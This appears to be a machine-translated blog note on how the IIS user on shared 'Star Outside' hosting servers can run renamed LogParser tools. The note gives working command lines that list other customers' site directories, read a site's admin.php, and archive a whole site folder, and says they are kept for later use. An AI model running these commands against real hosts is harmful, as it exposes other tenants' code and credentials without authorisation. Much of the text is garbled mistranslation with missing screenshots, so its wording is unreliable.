Recently encountered more and more are the star outside the host..a variety of balls..
The clouds broke, the stars outside the cross-the directory to read the file this vulnerability to bring a lot of convenience, so in this recording it for later reference use.
The problem occurs in the following files, these files are not strictly set the execution permissions, the current IIS user can smoothly use them to execute command:
c:\windows\7i24IISLOG.exe c:\windows\7i24IISLOG2.exe c:\windows\7i24IISLOG3.exe c:\windows\7i24IISLOG4.exe c:\windows\7i24tool.exe c:\windows\rsb.exe These files seems to be a star outside the processing log, set the permissions of the
Wherein the 7i24IISLOG. exe is actually LogParser And LogParser is a powerful Log analysis tool, the following use to column web directory:
c:\windows\7i24IISLOG "select top 1 0 0 path from e:\host\." -i:FS-rtp:-1
Returns are as follows:
Read one of the station directory information:
c:\windows\7i24IISLOG "select top 1 0 0 path from e:\host\0233ab\." -i:FS-rtp:-1
! 2. png
The following reads the file content:
c:\windows\7i24IISLOG "select text from e:\host\0233ab\web\admin.php" -i:textline-rtp:-1
! 3. png
7i24IISLOG3. exe can be packaged ISO file, use it the same can also be listed in the directory file information:
c:\windows\7i24IISLOG3 e:\host\0233ab\web\ c:\windows\temp\123.rar
! 4. png